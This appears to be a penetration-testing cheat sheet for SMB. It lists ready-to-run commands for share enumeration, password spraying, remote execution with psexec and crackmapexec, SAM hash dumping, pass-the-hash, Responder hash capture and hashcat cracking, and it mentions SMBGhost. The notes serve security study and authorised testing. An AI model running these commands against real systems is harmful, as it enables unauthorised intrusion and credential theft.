3. SMB

SMB Basics

• Function: Shared access to files, printers, etc.

• Ports:

  • TCP/139, UDP/137-138 (NetBIOS)

  • TCP/445 (Direct over TCP/IP)

• Samba: Unix/Linux implementation of SMB.

• MSRPC: Microsoft Remote Procedure Call, often used with SMB.

Enumeration

• Nmap:

nmap -sV -sC -p 139,445 <target_IP>

• Information: SMB version, hostname, OS (guess).

Misconfigurations

• Null Sessions (No Authentication Required):

smbclient -N -L //<target_IP>         # List available shares
smbmap -H <target_IP>                 # List shares with permissions
rpcclient -U '%' <target_IP>          # RPC enumeration
enum4linux-ng.py -A -C <target_IP>    # Comprehensive SMB enumeration

Protocol-Specific Attacks

• Brute-Forcing/Password Spraying:

crackmapexec smb <target_IP> -u <user_list> -p <password> --local-auth

• Windows Attacks:

  • Remote Code Execution (RCE):

impacket-psexec <user>:<password>@<target_IP>
crackmapexec smb <target_IP> -u <user> -p <password> -x 'whoami' --exec-method smbexec

• Enumerate Logged-on Users:

crackmapexec smb <target_IP> -u <user> -p <password> --loggedon-users

• Extract Hashes from SAM Database:

crackmapexec smb <target_IP> -u <user> -p <password> --sam

• Pass-the-Hash (PtH):

crackmapexec smb <target_IP> -u <user> -H <hash>

Forced Authentication Attacks (Responder)

responder -I <interface>     # Start Responder to capture NetNTLM hashes

• Hash Cracking:

hashcat -m 5600 <hash_file> <wordlist>

Latest SMB Vulnerabilities (CVE-2020-0796 - SMBGhost)

• Vulnerability: Compression mechanism flaw in SMBv3.1.1 allowing RCE by unauthenticated attacker.

• Affected Systems: Windows 10 1903, 1909.

• Exploitation: Public exploits are available for this vulnerability.